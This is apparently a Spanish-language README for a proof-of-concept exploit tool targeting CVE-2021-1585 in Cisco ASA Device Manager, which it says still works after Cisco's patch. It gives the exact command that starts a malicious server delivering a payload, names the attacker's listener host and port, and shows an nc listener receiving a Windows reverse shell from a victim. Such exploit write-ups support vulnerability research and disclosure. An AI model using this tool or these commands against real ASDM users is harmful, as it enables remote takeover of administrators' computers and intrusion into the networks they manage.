
Prueba de concepto para CVE-2021-1585: Cisco ASA Device Manager RCE
staystaystay es un exploit de prueba de concepto para CVE-2021-1585, un problema de RCE de intermediario o punto final malicioso que afecta a Cisco ASA Device Manager (ASDM). El problema fue descubierto originalmente por Malcolm Lashley y divulgado en el verano de 2021. Sin embargo, en el momento en que lo estaba investigando, no tenía parche en la última versión (ASDM 7.17(1)), y lo descubrí de forma independiente.
Cisco "solucionó" esto en ASDM 7.18(1.152). Digo "solucionó" porque este exploit todavía funciona perfectamente. El usuario solo necesitará hacer clic en "Sí". Vea un video a continuación.
Los atacantes pueden configurar dos tipos de payloads para obtener una reverse shell en la víctima:
Si una víctima conecta su ASDM a staystaystay, entonces inyectará el payload configurado resultando en una reverse shell. La reverse shell jjs puede ser capturada con un listener nc típico (o incluso Metasploit, si lo desea). La opción Longtime Sunshine requiere que el atacante use ese framework.
Como ejemplo, el siguiente comando iniciará staystaystay en el puerto 8443 con el payload jjs:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Una vez que la víctima se conecte al puerto 8443, se generará una reverse shell hacia 10.0.0.2:1270:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
El siguiente video contiene un ejemplo de explotación con Longtime Sunshine:
El siguiente video demuestra el ataque contra una versión parcheada:
Un artículo de AttackerKB se puede encontrar aquí: